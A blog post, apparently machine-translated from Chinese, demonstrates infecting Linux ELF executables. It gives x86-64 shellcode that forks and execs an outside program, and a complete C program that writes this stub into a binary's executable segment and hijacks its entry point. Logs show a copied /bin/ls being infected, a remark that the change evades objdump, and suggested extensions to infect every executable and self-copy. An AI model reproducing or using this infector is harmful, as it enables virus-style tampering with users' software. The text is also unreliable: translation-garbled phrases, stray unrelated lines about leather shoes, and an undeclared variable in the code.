Modify ELF executable entry to infect a program

When introducing how to inject code into Linux kernel module in the previous article, I mentioned that it is easy to "modify the entry of ELF file or PE file to jump to its own logic".

Is it really easy? Yes, it's really easy. This article is to demonstrate this.

Remember the panda burning incense virus. Early computer viruses, including it, injected their own code in this way and realized self replication. Of course, it does not necessarily modify the entry address, but it must have modified the ELF/PE file.

If you want to modify the ELF file, we first need to understand the structure of the ELF file, which only takes about 10 minutes to browse. This article will not take a long time to introduce the relevant concepts of elf.

The < ELF. H > header file already contains enough data structures and API s for us to modify the ELF executable file, which we can use.

The example shown in this article is very simple. It is to infect an existing LEF executable. First, we provide the code of the executable:

// hello.c
int main()
{
	printf("aaaaaaaaaaaaa\n");
}

We compile it into a hello executable.

Next, we try to use another program to modify its entry. The new entry logic is as follows:

if (fork() == 0) {
	exec("/bin/aa");
} else {
	goto orig_entry;
}

We definitely can't inject C code directly into ELF file, just like we can't inject Ramen soup into blood vessel. So we must get the assembly instruction code of the above logic.

How to get the instruction code?

We manually write the above C logic into an inline assembly, and then compile it into an executable file. Through objdump, we can find the assembly instruction code:

void func()
{
	asm ("xor %rax, %rax;\n"
		 "mov $0x39, %al;\n" // System call number of fork
		 "syscall; \n"
		 "test %eax, %eax;\n"
		 "je exec;\n"
		 "nop; nop; nop; nop; nop;\n" // 5-byte occupation instruction of jmp orig, to be determined at runtime
		 "exec:\n"
		 "mov $0x61612f6e69622f, %r11;\n"
		 "push %r11\n;"
		 "mov $0x0, %edx;\n"
		 "mov $0x0, %rsi;\n"
		 "mov %rsp, %rdi;\n"
		 "mov $0x3b, %eax;\n"  // Fill in the system call number of exec
		 "syscall;\n"
		 "orig:\n"
		);
}

void main()
{
	func();
}

After compiling, we can get the following instructions through objdump-d:

00000000004004cd <func>:
  4004cd:   55                      push   %rbp
  4004ce:   48 89 e5                mov    %rsp,%rbp
  4004d1:   48 31 c0                xor    %rax,%rax
  4004d4:   b0 39                   mov    $0x39,%al
  4004d6:   0f 05                   syscall
  4004d8:   85 c0                   test   %eax,%eax
  4004da:   74 05                   je     4004e1 <exec>
  4004dc:   90                      nop
  4004dd:   90                      nop
  4004de:   90                      nop
  4004df:   90                      nop
  4004e0:   90                      nop

00000000004004e1 <exec>:
  4004e1:   49 bb 2f 62 69 6e 2f    movabs $0x61612f6e69622f,%r11
  4004e8:   61 61 00
  4004eb:   41 53                   push   %r11
  4004ed:   ba 00 00 00 00          mov    $0x0,%edx
  4004f2:   48 c7 c6 00 00 00 00    mov    $0x0,%rsi
  4004f9:   48 89 e7                mov    %rsp,%rdi
  4004fc:   b8 3b 00 00 00          mov    $0x3b,%eax
  400501:   0f 05                   syscall

OK, after sorting it out, we will get the following stub "code array:

unsigned char stub_code[] =
				"\x48\x31\xc0"									// xor    %rax,%rax
                "\xb0\x39"										// mov    $0x39,%al
                "\x0f\x05"										// syscall
				"\x85\xc0"										// test   %eax,%eax
				"\x74\x05"										// je     40070c <__FRAME_END__+0x14>
				"\x00\x00\x00\x00\x00" // index is 11			// jmpq   400430 <_start>
				"\x49\xbb\x2f\x62\x69\x6e\x2f\x61\x61\x00"		// movabs $0x61612f6e69622f,%r11
				"\x41\x53"										// push   %r11
				"\xba\x00\x00\x00\x00"							// mov    $0x0,%edx
				"\x48\xc7\xc6\x00\x00\x00\x00"					// mov    $0x0,%rsi
				"\x48\x89\xe7"									// mov    %rsp,%rdi
				"\xb8\x3b\x00\x00\x00"							// mov    $0x3b,%eax
				"\x0f\x05";										// syscall
#define RELJMP	11

The raw material is ready, waiting to inject the bytecode in the above array into the hello program.

Before implementing injection, explain two points.

First, note the instructions above:

movabs $0x61612f6e69622f,%r11
push   %r11
mov    %rsp,%rdi

Obviously, according to the function call parameter specification of X86 ʄ, rdi register is the first parameter of Exec System call, that is "/ bin/aa" , but the parameter preparation of exec is extremely troublesome and requires a string. We know that the string is saved in a separate section of the ELF file. I don't want to be so troublesome. To inject another string, I just want to inject a piece of code, just the code. So I take a trick here:

// I encoded the string into a long number.
char name[8] = {'/', 'b', 'i', 'n', '/', 'a', 'a', 0};
char *pname;
unsigned long pv = *(unsigned long *)&name[0];
// 0x61612f6e69622f, i.e. aa/nib /, small end converted to / bin/aa
pname = (char *)&pv; // pname is aa

At the same time, I use push to save the pointer of the long number in the rsp. In this way, only the following operations are required. The rdi register is the first parameter of exec

push   %r11
mov    %rsp,%rdi

In this way, the complex string saving and operation are omitted. Is it fun? Before going on, / bin/aa needs to be revealed. It's actually very simple, that is, to print a sentence:

int main()
{
    printf("rush tighten beat electric discourse\n"); // The meaning of "call now"
}

The effect we want is that all infected programs (in our case, hello) will print the sentence "call now" when they are executing.

OK, let's move on.

It's time to give the code to modify the entry, or that sentence, I can't guarantee that this code is completely bug free, but it's simple enough and can work. In order to show the effect, simplicity is the most important.

The code is as follows:

#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <elf.h>

unsigned char stub_code[] =
				"\x48\x31\xc0"									// xor    %rax,%rax
				"\xb0\x39"										// mov    $0x39,%al
				"\x0f\x05"										// syscall
				"\x85\xc0"										// test   %eax,%eax
				"\x74\x05"										// je     40070c <__FRAME_END__+0x14>
				"\x00\x00\x00\x00\x00" // index is 11			// jmpq   400430 <_start>
				"\x49\xbb\x2f\x62\x69\x6e\x2f\x61\x61\x00"		// movabs $0x61612f6e69622f,%r11
				"\x41\x53"										// push   %r11
				"\xba\x00\x00\x00\x00"							// mov    $0x0,%edx
				"\x48\xc7\xc6\x00\x00\x00\x00"					// mov    $0x0,%rsi
				"\x48\x89\xe7"									// mov    %rsp,%rdi
				"\xb8\x3b\x00\x00\x00"							// mov    $0x3b,%eax
				"\x0f\x05";										// syscall
#define RELJMP	11

int main(int argc, char **argv)
{
	int fd, i;
	unsigned char *base;
	unsigned int size, *off, offs;
	unsigned long stub, orig;
	unsigned long clen = sizeof(stub_code);
	Elf64_Ehdr *ehdr;
	Elf64_Phdr *phdrs;

	// This is an e9 jmp rel32 instruction
	stub_code[RELJMP] = 0xe9;
	off = (unsigned int *)&stub_code[RELJMP + 1];

	fd = open(argv[1], O_RDWR);
	size = lseek(fd, 0, SEEK_END);
	base = mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);

	ehdr = (Elf64_Ehdr *) base;
	phdrs = (Elf64_Phdr *) &base[ehdr->e_phoff];
	shdrs = (Elf64_Shdr *) &base[ehdr->e_shoff];
	orig = ehdr->e_entry;

	for (i = 0; i < ehdr->e_phnum; ++i) {
		if (phdrs[i].p_type == PT_LOAD && phdrs[i].p_flags == (PF_R|PF_X)) {
			// It is assumed that there is only one executable program header
			stub = phdrs[i].p_vaddr + phdrs[i].p_filesz;
			ehdr->e_entry = (Elf64_Addr)stub;
			// In order to jump back to the original entry, the relative offset needs to be calculated here
			offs = orig - (stub + RELJMP) - 5;
			// The pending rel32 is finally assigned
			*off = offs;

			memcpy(base + phdrs[i].p_offset + phdrs[i].p_filesz, stub_code, clen);
			printf("fsie:%d   %08x\n", phdrs[i].p_filesz, ehdr->e_entry);

			phdrs[i].p_filesz += clen;
			phdrs[i].p_memsz += clen;
			break;
		}
    }
    munmap(base, size);
}

Let's go! Come on!

[root@localhost modentry]# cat test-1
gcc hello.c -o hello
gcc modelf.c -o modelf
./modelf ./hello
[root@localhost modentry]# ./test-1
hello.c: In function'main'in:
hello.c:3:2: Warning: implicit declaration and built-in functions'printf'incompatible [Enabled by default]
  printf("aaaaaaaaaaaaa\n");
  ^
fsie:1788   004006fc
[root@localhost modentry]# ./hello
aaaaaaaaaaaaa
rush tighten beat electric discourse
[root@localhost modentry]# ./hello
aaaaaaaaaaaaa
[root@localhost modentry]# rush tighten beat electric discourse

[root@localhost modentry]# ./hello
aaaaaaaaaaaaa
[root@localhost modentry]# rush tighten beat electric discourse

Successful infection!

Let's infect the command of a system to see how to:

[root@localhost modentry]# cp /bin/ls ./
[root@localhost modentry]# ./modelf ./ls
fsie:103980   0041962c
[root@localhost modentry]# ./ls
hello  hello.c  ls  modelf  modelf.c	nop  pwd  test-1 
rush tighten beat electric discourse

Successful infection!

The infection code above is very simple. You may think it's wrong. Yes, it is wrong, because it hopes there is free space behind the program. I haven't even modified the size of the section and the size of the file. We found that the size of the file hasn't changed before and after the injection of infection, and there are better side effects:

[root@localhost modentry]# /bin/ls
hello  hello.c  ls  modelf  modelf.c	nop  pwd  test-1  
[root@localhost modentry]# objdump -D /bin/ls >./lsdump1
[root@localhost modentry]# ./ls
hello  hello.c  ls  lsdump1  modelf  modelf.c  nop  pwd  test-1
rush tighten beat electric discourse
[root@localhost modentry]# objdump -D ./ls >./lsdump2
[root@localhost modentry]#
[root@localhost modentry]# diff lsdump1 lsdump2
2c2
< /bin/ls:      file format elf64-x86-64
---
> ./ls:      file format elf64-x86-64

We see that there is no difference in the results of objdump. If we improve the program, it will be easier to expose it. If I add the adjust sections size operation in model. C, then after the executable is infected, the result of objdump will be more than the following:

00000000004006f8 <__FRAME_END__>:
  4006f8:   00 00                   add    %al,(%rax)
  4006fa:   00 00                   add    %al,(%rax)
  4006fc:   48 31 c0                xor    %rax,%rax
  4006ff:   b0 39                   mov    $0x39,%al
  400701:   0f 05                   syscall
  400703:   85 c0                   test   %eax,%eax
  400705:   74 05                   je     40070c <__FRAME_END__+0x14>
  400707:   e9 24 fd ff ff          jmpq   400430 <_start>
  40070c:   49 bb 2f 62 69 6e 2f    movabs $0x61612f6e69622f,%r11
  400713:   61 61 00
  400716:   41 53                   push   %r11
  400718:   ba 00 00 00 00          mov    $0x0,%edx
  40071d:   48 c7 c6 00 00 00 00    mov    $0x0,%rsi
  400724:   48 89 e7                mov    %rsp,%rdi
  400727:   b8 3b 00 00 00          mov    $0x3b,%eax
  40072c:   0f 05                   syscall

Look carefully, is it the code we inject?

Finally, I want to explain why exec is called to execute external programs? Isn't it more direct to just put code in?

Yes, I know that, but:

  1. It's just a demo program. I don't want to make it too complicated to play in a single stub \.
  2. Because libc and library functions have not been initialized at entry, there may be a problem calling printk.
  3. Printing in stub code makes bytecode very redundant and complex.

However, my goal has been demonstrated. If I am not afraid of any trouble, I can put the following logic into the stub code:

  • Scan all executable files of the system, inject each executable file with the code shown in this article.
  • Code add self copy function.

Place an order for the manager to purchase ¥ 18000 leather shoes and ¥ 49800 trousers for cash on delivery.

Wenzhou leather shoes in Zhejiang Province are wet, and they will not be fat if it rains and floods.

Tags: Linux

Posted on Fri, 08 May 2020 20:04:59 -0700 by petrb